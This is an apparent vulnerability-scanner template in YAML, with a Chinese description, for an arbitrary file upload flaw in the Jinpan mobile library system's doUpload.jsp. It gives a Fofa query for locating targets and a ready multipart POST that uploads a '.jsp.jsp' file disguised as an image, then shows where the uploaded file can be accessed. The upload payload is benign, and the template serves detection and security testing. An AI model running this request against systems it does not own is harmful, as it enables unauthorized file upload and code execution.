漏洞描述
金盘图书馆微信管理平台 doUpload.jsp接口存在任意文件上传漏洞,攻击者通过漏洞可以获取权限。
Fofa: app="金盘软件-金盘移动图书馆系统"
id: jinpan-doupload-fileupload
info:
name: 金盘移动图书馆系统存在任意文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |-
金盘图书馆微信管理平台 doUpload.jsp接口存在任意文件上传漏洞,攻击者通过漏洞可以获取权限。
Fofa: app="金盘软件-金盘移动图书馆系统"
reference:
- https://mp.weixin.qq.com/s/vbuu5Dh7SshVtMVjJKaLKg
tags: jinpan,fileupload
created: 2024/02/28
set:
rboundary: randomLowercase(8)
randstr: randomLowercase(6)
rules:
r0:
request:
method: POST
path: /pages/admin/tools/uploadFile/doUpload.jsp
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp.jsp\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
{{randstr}}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: |
response.status == 200 &&
response.body.bcontains(b'"filePaths":') &&
response.body.bcontains(b'"fileNames":') &&
response.body.bcontains(b'"fileSizes":') &&
response.body.bcontains(b'"uploadFileNames":')
expression: r0()
# 文件访问:http://127.0.0.1:8030/upload/2024-02-18/1708219487227.jsp